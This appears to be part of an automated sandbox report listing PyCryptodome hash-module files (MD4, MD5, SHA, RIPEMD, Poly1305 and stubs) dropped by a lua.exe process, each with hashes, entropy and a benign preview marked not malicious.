SSDEEP:	96:MwDqrYJALrYJHdt3EHGuIuyHgkIc+VpFfjlBPazI1i4a9m2gNeJ3JOMTRt/XklO/:9qrskrs9t3q/IuHJbD62itgGZ3FWtA
MD5:	815AD75FFCEB01DBC18A797BEB80D57E
SHA1:	90AEFD81B088EC63E771C502377380B5A83AAB0A
SHA-256:	26196B146E61C65278C91C066B7460FEBC3200DC14FB5E842C471E6D56C39783
SHA-512:	2025D72689B0A4CF2B1B30BAD9593DF40EB632C20628916F7141832930D6F42FEE3E79B951620A161B19213C18E4E5C1C5A1EC946B4F68E0911A9FB636D0E4ED
Malicious:	false
Preview:	# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Hash\MD4.pyi Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	551
Entropy (8bit):	4.846633197285402
Encrypted:	false
SSDEEP:	12:1REYB3vIY3g2RypRyLu1AGR4Qwu5LgR4+OR47Ry5Ryn:1REcT3g2QEWAczQ/UYwy
MD5:	74AB60EEF22557EA93605E680CA5D294
SHA1:	6EE4291D7DB2B6787D18FC27DAD203ED326B3C3C
SHA-256:	0602DA2A342D9EF1F7C015F953B2DF27F51C25A5E99F89044E71579662EBA5FF
SHA-512:	F87B68B8145984213A2028813A82CD51C294D1A5D723DC92983662E24859EDFF25F5D608C2EC806BB052EC3BA8D8ABAB47C8047347C499FAE16833BB0A6CCC97
Malicious:	false
Preview:	from typing import Union, Optional....Buffer = Union[bytes, bytearray, memoryview]....class MD4Hash(object):.. digest_size: int.. block_size: int.. oid: str.... def __init__(self, data: Optional[Buffer] = ...) -> None: ..... def update(self, data: Buffer) -> None: ..... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def copy(self) -> MD4Hash: ..... def new(self, data: Optional[Buffer] = ...) -> MD4Hash: .......def new(data: Optional[Buffer] = ...) -> MD4Hash: .....digest_size: int..block_size: int..

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Hash\MD5.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	6802
Entropy (8bit):	4.584130593682968
Encrypted:	false
SSDEEP:	96:dFQHvo7H1kIcKxYHSvtZzUwipIDwNHiw3aOMzCkDXXgcNdymaZ/HSxUY59Rk:bQHvLSrifNBKoknPDdzRk
MD5:	9B5CEA3FA09AFC6A601C87474223CF35
SHA1:	2D5EFB95669296497442EFBD696460F2049D3FA6
SHA-256:	5B3966F7457DB844BE069E442139F2863B2407D9C803EDCA064CE878BBD263E5
SHA-512:	3C989A5974DECE408C53EF69F45C4003DA506FE681C1196B29C7F9F5A4FC97264C39272952256BB7C8ACAFD9D2F7E783F815D8AD3E0AA97573F11103F13786A6
Malicious:	false
Preview:	# -- coding: utf-8 --..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE...# ================================================================

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Hash\MD5.pyi Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	511
Entropy (8bit):	4.765158993873355
Encrypted:	false
SSDEEP:	12:1REYBjvIY3IpRypRyLu1AwLsQwu5QlGLsIc4LsIJRy5Ryn:1REET3EQEWAwL/1LQ4Ljwy
MD5:	1F1147ECB293220FC948730F06836366
SHA1:	E467DEF3A20461383919E11A801E0B57BBDC85E6
SHA-256:	8A3E274302454BFF4450C1DF6DA89A048F13EB048E64C6781408F18066F8430B
SHA-512:	762332FFC8A79CEFABE74934DEBC2F101EB2BF66584765D21B8A3E21D0483F3AD2A18D60337573121A048588375D225A07F2698616B8227EDFF20FC95528A441
Malicious:	false
Preview:	from typing import Union....Buffer = Union[bytes, bytearray, memoryview]....class MD5Hash(object):.. digest_size: int.. block_size: int.. oid: str.... def __init__(self, data: Buffer = ...) -> None: ..... def update(self, data: Buffer) -> None: ..... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def copy(self) -> MD5Hash: ..... def new(self, data: Buffer = ...) -> MD5Hash: .......def new(data: Buffer = ...) -> MD5Hash: .....digest_size: int..block_size: int..

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Hash\Poly1305.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	8291
Entropy (8bit):	4.581460307129591
Encrypted:	false
SSDEEP:	96:vkJbFQHvo7EHgSrkIp2iliiM/QpkFLwZD42MzZFEtP2CTHOV:cJJQHv3ViiRM8Zszze+WOV
MD5:	041E76ED0853FC3D34926662B89C7EC9
SHA1:	C96F71E6A2A302C9A275F88FB524767D3953004C
SHA-256:	F837E4153ED4E178F518F71A87315C172C3B60CB4F132A6F19F68AF9BCA336F7
SHA-512:	9C6DF959510E2D2ABA4A9808E62288A74FE225911AFD854B85A8345A25131F352504F9176E3F290FC99A61B04E21A1C08531FF45D8CD3D348DEF74E70458B0D3
Malicious:	false
Preview:	# -- coding: utf-8 --..#..# Hash/Poly1305.py - Implements the Poly1305 MAC..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE...# ===========

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Hash\Poly1305.pyi Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	689
Entropy (8bit):	4.617411626220112
Encrypted:	false
SSDEEP:	12:1Ro8s7REYBjvIY3wzRyaRyLu1Ac08UwEW5RwW0WFWXo84WLBh3Ls/y:1RM7CET32rEWAc0/W1WXo8xLB9LMy
MD5:	75346EDCB93D820A434DB03BE87622A5
SHA1:	47369DC52B3FAD5BF609908FB1AEACE8D87E2E01
SHA-256:	7DA8B1DB291F97F8751EBE26AAFB6663571467C4A13827F8114895990E3DD81A
SHA-512:	0F1CA6D6FCC2176B6F8FC7849CF5E14C77109CD92C690B81EC796F204ACADF69F3AD444F674EC3D751CAB4A959232F2BAF6D5E65D4BB174B1C5115A8EF413E1B
Malicious:	false
Preview:	from types import ModuleType..from typing import Union....Buffer = Union[bytes, bytearray, memoryview]....class Poly1305_MAC(object):.. block_size: int.. digest_size: int.. oid: str.... def __init__(self,.. r : int,.. s : int,.. data : Buffer) -> None: ..... def update(self, data: Buffer) -> Poly1305_MAC: ..... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def verify(self, mac_tag: Buffer) -> None: ..... def hexverify(self, hex_mac_tag: str) -> None: .......def new(key: Buffer,.. cipher: ModuleType,.. nonce: Buffer = ...,.. data: Buffer = ...) -> Poly1305_MAC: .....

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Hash\RIPEMD.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1225
Entropy (8bit):	5.174131605423868
Encrypted:	false
SSDEEP:	24:lcAXDrFR/F2IPBiCXCpjf29QHupsUre38Ok41+dpo3oq/FbUgtQ+5VYGtQq+tQke:KIB0jcQHMsvI/S3oCFbn5DB+o
MD5:	CB30EA21F8B046CCE596D4E9D85D2C36
SHA1:	39A1CFA3C5664E638359F8EBB44CC8BE70D96125
SHA-256:	E811E75C7B6A01CDFAF40C3EF330BDAF01EDD45AAF449396A669EB1FF78C8CC6
SHA-512:	9DF776A64BE9A1C0405C29C3B5E41295EF558741F9695B6C968ECE87354099F12B490A1B125D0CF778992404F92ECF3C3DEFD854E9DB4C6B31B13C1B4ADEA5D9
Malicious:	false
Preview:	# -- coding: utf-8 --..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE...# ================================================================

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Hash\RIPEMD.pyi Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	97
Entropy (8bit):	4.494398793678958
Encrypted:	false
SSDEEP:	3:SbFQZmK2lfvo0NEr3Ssov+7Qt/ZTv:SbFsmK2lfWr3SsBktxTv
MD5:	37FCCB2128F28CB860905F19A5DE5664
SHA1:	E195627D9120B8DF358962BFE57EB1AF121510A7
SHA-256:	4E4A85E6BC544386180FAAB57B719D40C8B07D04FF1AD0A222AEDEFD81A29DD4
SHA-512:	A33C96C3A508D2C288E34036AD8F5748BC8993BC08D33785E554553E99A7E4818F853593E8D6695F4BA936B528748E96BF2969B616302F3B6AB4DBF7B08EBE6E
Malicious:	false
Preview:	# This file exists for backward compatibility with old code that refers to..# Crypto.Hash.SHA....

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Hash\RIPEMD160.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	6567
Entropy (8bit):	4.770780657565152
Encrypted:	false
SSDEEP:	96:MwDqrYJALrYJHdt3EHGuIWHgkInaAHSvw5zbixIwNHZ3aOMmkXX4NUjfj:9qrskrs9t3q/IDJbiXN5KoknNP
MD5:	294D8E4BD1689A8559B935B6D234F5F1
SHA1:	23F0157DBFF6D5A4339E66FA0526C38CF3C91CB0
SHA-256:	CBCCB75E5F0647E5C18B743266D00300EEA5D15D164E3008ACBD934894A4AB43
SHA-512:	2D39E18D2C36E72B0CF236E7FFA0C37857B5EB5304CD96CFCBD214B5CA676AFA4A0C377C80C028163FAF53E9D7400E3598F4BD21C36DDD95AEE42A22BE657710
Malicious:	false
Preview:	# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Hash\RIPEMD160.pyi Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	535
Entropy (8bit):	4.931502616073856
Encrypted:	false
SSDEEP:	12:1REYBjvIY33hUlRypRyLu1AwLsQwu5TUhGLs7Ug4Ls7UdRy5Ryn:1REET3RWQEWAwL/N/L+14L+ywy
MD5:	A9429F32C25E1E86987C94D3EE514342
SHA1:	176B307242F24A7BFF87D2A74EE609324AD26550
SHA-256:	84F643A25DF20E6A761AD4E1ECDC6F04493DB5CCAF6108254B944A31662A00E7
SHA-512:	2A7910E7C1091CC7F9F1D4993EF594F77B2E29841A2B64A702A53BFF6C7231B1224A63A9FC979117614547F699A0EA7864A5C622B083617A1AF316CD51AB1B79
Malicious:	false
Preview:	from typing import Union....Buffer = Union[bytes, bytearray, memoryview]....class RIPEMD160Hash(object):.. digest_size: int.. block_size: int.. oid: str.... def __init__(self, data: Buffer = ...) -> None: ..... def update(self, data: Buffer) -> None: ..... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def copy(self) -> RIPEMD160Hash: ..... def new(self, data: Buffer = ...) -> RIPEMD160Hash: .......def new(data: Buffer = ...) -> RIPEMD160Hash: .....digest_size: int..block_size: int..

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Hash\SHA.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1172
Entropy (8bit):	5.117383873972604
Encrypted:	false
SSDEEP:	24:lcAXDrFR/F2IPBiCXCpjf29QHupsUre38Ok41+dpo3oq/FbUgtj+tue:KIB0jcQHMsvI/S3oCFbnZ+B
MD5:	6C017EB81EF21818A9368CCC5143F50B
SHA1:	1D1229CDE4338C4BA3F969AF90700FC8960BBF08
SHA-256:	C86BAD9D4AFFEAC58CE3884195E177E1418721C8E3B70684ACDDC36E74BC943F
SHA-512:	5BF8D63655B09CAE49255FBCBAB152CAC1FF5E14FE5BAE2AA4221E6618E911FA0D5193743C82BB66473699D59974B9CE1633CA0DE68495B9CDF63FB947D2AD7F
Malicious:	false
Preview:	# -- coding: utf-8 --..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE...# ================================================================

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Hash\SHA.pyi Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	165
Entropy (8bit):	4.73872569825065
Encrypted:	false
SSDEEP:	3:SbFQZmK2lfvo0NEr3Ssov+7Qt/ZTzJmMkt/Z1oQpKGOIWufs/96Lf9:SbFsmK2lfWr3SsBktxTN+tx1xpdhVs/2
MD5:	0DE894DECF1A876B03938929070F04E5
SHA1:	DCB783EF505138E743F04546FD5A2D6C6A4840FB
SHA-256:	0AEA71662B258A56912F1274D95677A727F619A48604D1B1B991891F22ED047D
SHA-512:	B2468F52C9C79C44A5BB9CC002E9318FA7C18B60918A85797C21E1A925A23070262A892D864CD1A66F4C14646AC38B8142F2F578D869F453060F58F41C663652
Malicious:	false
Preview:	# This file exists for backward compatibility with old code that refers to..# Crypto.Hash.SHA....from Crypto.Hash.SHA1 import __doc__, new, block_size, digest_size..

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Hash\SHA1.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	6875
Entropy (8bit):	4.5821494704539845
Encrypted:	false
SSDEEP:	96:dFQHvo7H1kIpQ1IUeNNUPHSvwmlz+irILNHU3aOMj9XXgNp5+T/HSxUYfARk:bQHvgQ1IVNNx9+iUN0KN9nINdoRk
MD5:	ADA65380EE21DCC4351BBF2883F9B8FE
SHA1:	F1C8A946C677B83B30B5FAADAE98C8EF30BA2A22
SHA-256:	6C3CE9B0E7B65218814CEB19987644C776D4C36495C2875470FC94149A8A0015
SHA-512:	505E499F9D590814F2EED4384D38708D373EC7C5E8132D20A16FCFA84F056F2181FFF8AE044E73B21C9F4646F5CF0CA2D012F39E342F2763C2ECCF7CD7E5FCF8
Malicious:	false
Preview:	# -- coding: utf-8 --..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE...# ================================================================

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Hash\SHA1.pyi Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	555
Entropy (8bit):	4.858937300843863
Encrypted:	false
SSDEEP:	12:1REYB3vIY3vRypRyLu1AGR4Qwu59gR48OR4pRy5Ryn:1REcT3JQEWAczqjUswy
MD5:	B35CDD0C45717949B3D05F871CE86E01
SHA1:	937CCC519B51BC2AA994CB9F8BD21AAD37865B74
SHA-256:	4FC9652243B1B4A443C08C6B22F5C5343C63453405A13FBE9CC9DD12DE6951EA
SHA-512:	92E8217DD0C0FA48A33EC261921B5BB6EB385AE47271F2E2E447EFD29279FEE668ECD3A8E910AF34C062CB6CC7CAFE836525CBD93194335F3996FCF78397F69F
Malicious:	false
Preview:	from typing import Union, Optional....Buffer = Union[bytes, bytearray, memoryview]....class SHA1Hash(object):.. digest_size: int.. block_size: int.. oid: str.... def __init__(self, data: Optional[Buffer] = ...) -> None: ..... def update(self, data: Buffer) -> None: ..... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def copy(self) -> SHA1Hash: ..... def new(self, data: Optional[Buffer] = ...) -> SHA1Hash: .......def new(data: Optional[Buffer] = ...) -> SHA1Hash: .....digest_size: int..block_size: int..

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Hash\SHA224.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	7087
Entropy (8bit):	4.539811851927445
Encrypted:	false
SSDEEP:	96:dFQHvo7HgkIxtUI7eJ+DqHSv4bz1iBI+6NHh3aOM0CXXiNvs54/WxUvRqRk:bQHvjtUI6J+21i6NBKOCnE+GQRk
MD5:	DA93616992C4934DB1A0D8073472F425
SHA1:	9F9D2B184F043FF932BFDDB3E21B647BB5C67FB7
SHA-256:	D872AF137DA84299B930FBFD1FC433FC86E0B38E0046E3D5F981F7EED9BB8CB8
SHA-512:	3B1554F21F095128B5C937E154DC2614DDEFF3F59654AE3B676199A36C4E74BF173E997F5196A94670BF6AF94B10CBB42AE71D92B722005FC7436B159B2CCEDB
Malicious:	false
Preview:	# -- coding: utf-8 --..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE...# ================================================================

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Hash\SHA224.pyi Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	563
Entropy (8bit):	4.8974516866478135
Encrypted:	false
SSDEEP:	12:1REYB3vIY36RypRyLu1AGR4Qwu5YgR4vOR40Ry5Ryn:1REcT36QEWAczPsUPwy
MD5:	F91615062C7CF8B106319B16A210EDD1
SHA1:	6BB2CC5E2BB4140E17A3CB821E84FD8408798AEF
SHA-256:	A3FBCEE498C3C4CADC8D5136ACED4C69DE9B941802AEA4AEF8C6B272DF1E054A
SHA-512:	305B86FDCA88498DC390D013DF6F8ECE0D47A3E79C7E2855D282A8DDE865EE0914643960F04082D52B906EC5DC0603B5403316D87A03A0E0F89178D8D6108497
Malicious:	false
Preview:	from typing import Union, Optional....Buffer = Union[bytes, bytearray, memoryview]....class SHA224Hash(object):.. digest_size: int.. block_size: int.. oid: str.... def __init__(self, data: Optional[Buffer] = ...) -> None: ..... def update(self, data: Buffer) -> None: ..... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def copy(self) -> SHA224Hash: ..... def new(self, data: Optional[Buffer] = ...) -> SHA224Hash: .......def new(data: Optional[Buffer] = ...) -> SHA224Hash: .....digest_size: int..block_size: int..

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Hash\SHA256.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	7082
Entropy (8bit):	4.551051071355653
Encrypted:	false
SSDEEP:	96:dFQHvo7HgkIfKXI6e2D0FHSv3ezgi3IYVNHi3aOMtDXXZN4XM1/WxUvT1Rk:bQHvBKXIT2DsgiVNCKnDno1GBRk
MD5:	3AE05618B8FF7C9E5CB142C185620CD7
SHA1:	7568E53C598F80B07FCC378D6BB67B92A1285E1D
SHA-256:	DA3433ADAEBE699670076ABB87B264F30B568692279E535240EE76D65A33A4B9
SHA-512:	FADB71B017E324ECBD1D35BB1E39B0AD017BF3A965AFDA783EC719BB877EC64CC4458209F819C9CD07B3FAF9CD1437F55648BF1D6F74EE883AA74185108E50D9
Malicious:	false
Preview:	# -- coding: utf-8 --..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE...# ================================================================

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Hash\SHA256.pyi Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	630
Entropy (8bit):	4.955837939042722
Encrypted:	false
SSDEEP:	12:1REYBS55RypRyLXFL1AG7EY3AwNIY3T5Dvg7EY3LCO7EY3LMRy5Ryn:1RENQEXFRAQ/3v3Ts/3+Y/3kwy
MD5:	5630B6D27721452497E9BEE7183E9925
SHA1:	ACF9207E410A212984F867D9B1FEEEEEDA3C6B86
SHA-256:	07892D70C0FA32A19DDA232203BD7FF0D25B19F30E599924836A8D4BB6161A71
SHA-512:	1DC45AFC8773B4D797246C6972D9EFD60514C95F8C7AC19FA85D72493E7B92DE2475A2CD0AF5E11152B129E7B6904AC5DD88B378DA9D17749B2C0FD85C9A541D
Malicious:	false
Preview:	from typing import Union, Optional......class SHA256Hash(object):.. digest_size: int.. block_size: int.. oid: str.. def __init__(self, data: Optional[Union[bytes, bytearray, memoryview]]=None) -> None: ..... def update(self, data: Union[bytes, bytearray, memoryview]) -> None: ..... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def copy(self) -> SHA256Hash: ..... def new(self, data: Optional[Union[bytes, bytearray, memoryview]]=None) -> SHA256Hash: .......def new(data: Optional[Union[bytes, bytearray, memoryview]]=None) -> SHA256Hash: .......digest_size: int..block_size: int..

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Hash\SHA384.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	7085
Entropy (8bit):	4.550445959384944
Encrypted:	false
SSDEEP:	96:dFQHvo7HgkI7+bImeS/IhHSvqIzEiLI8BNHG3aOMtrXXIN8Xkl/WxUv/5Rk:bQHvl+bIHS/5Ei9NmKzrnNBGBRk
MD5:	430024F4F59A49D48670405B3872A139
SHA1:	38B2F9BFDA9D28D665317305B6A9A5CE61245EF0
SHA-256:	C9264E99E50F4D958A133F2DD00B90384767753A0BC0C8345BEBA0B22CD46FF0
SHA-512:	22268CB2CBA27B1144D7F1A3D20ACAB0B9EE91E23E94618EF615E042EEFD672FD9E261BA1C9EB78FE5576D80D075093178F1AD38BB5947CD1A8603F67F67224F
Malicious:	false
Preview:	# -- coding: utf-8 --..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE...# ================================================================

C:\ProgramData\ShellExperienceHost\Lib\site-packages\Crypto\Hash\SHA384.pyi Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	563
Entropy (8bit):	4.911661278122058
Encrypted:	false
SSDEEP:	12:1REYB3vIY3RRypRyLu1AGR4Qwu5LgR4+OR47Ry5Ryn:1REcT33QEWAczstU6wy
MD5:	33C3A44EFBCBD9A7B7DB7C3E4FA0CF28
SHA1:	FCFEFCF1D7DAFBF71741A52550364BDF4813E021
SHA-256:	102F8DCEC4B3E3E3E019F6CE2B165C0FDDC41B70EB2E3169270BE35F227F2D5F
SHA-512:	A119DC31EADE919C8572205CB2E9865D8C305AFB21CE5A4189885524A82E7086CA1B86103EBCC36398A63FC89D750C3918CDDC18DFB3B9F0DDF6824AACDBBEF8
Malicious:	false
